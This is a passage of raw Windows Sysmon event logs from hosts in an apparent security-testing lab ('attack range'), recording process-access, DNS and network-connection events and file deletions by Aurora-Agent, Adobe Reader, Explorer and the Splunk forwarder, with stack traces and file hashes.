Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.898{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.898{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.898{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 354300x800000000000000047158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.313{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64903- 354300x800000000000000047157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.312{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local65247- 10341000x800000000000000047156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.306{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x800000000000000047155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.306{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x800000000000000047154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.301{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005188C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+dc3e5|C:\Windows\Explorer.EXE+6e771|C:\Windows\Explorer.EXE+4d787|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\Explorer.EXE+51aca|C:\Windows\Explorer.EXE+8f773|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000047153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.156{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F3A96A85DC0060557E5F467A97DEE0,SHA256=6903E62BDAAD0EE7273EB09DF3940F9BE8BCADB5F07134856D8BF38FCD337B4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.155{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12C95461E55B57042C6A392CAE0D247B,SHA256=C6E4CAE6524AD896B12D3021D67A0DDC4A73494A3BFB89DB5025D68BEFF82D8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.129{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000018720Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:12.273{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD0E0A576EF4D3DF81185207B5BE18F,SHA256=FF84F2401ACCF29F25EFA939379B9E51E9852BF2085F743BC33E695B454C65DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.101{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c3d3|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x800000000000000047149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.031{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.030{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000018721Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:13.374{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21E331B6249E1C72FC276B4530E3E35B,SHA256=92D437A4E41644A0E0F734F5DBE49FF153EC33A74D8C8A5DEC062844B899DACA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000047188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.690{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local57380- 354300x800000000000000047187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.624{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56474-false10.0.1.12-8000- 10341000x800000000000000047186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.663{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader 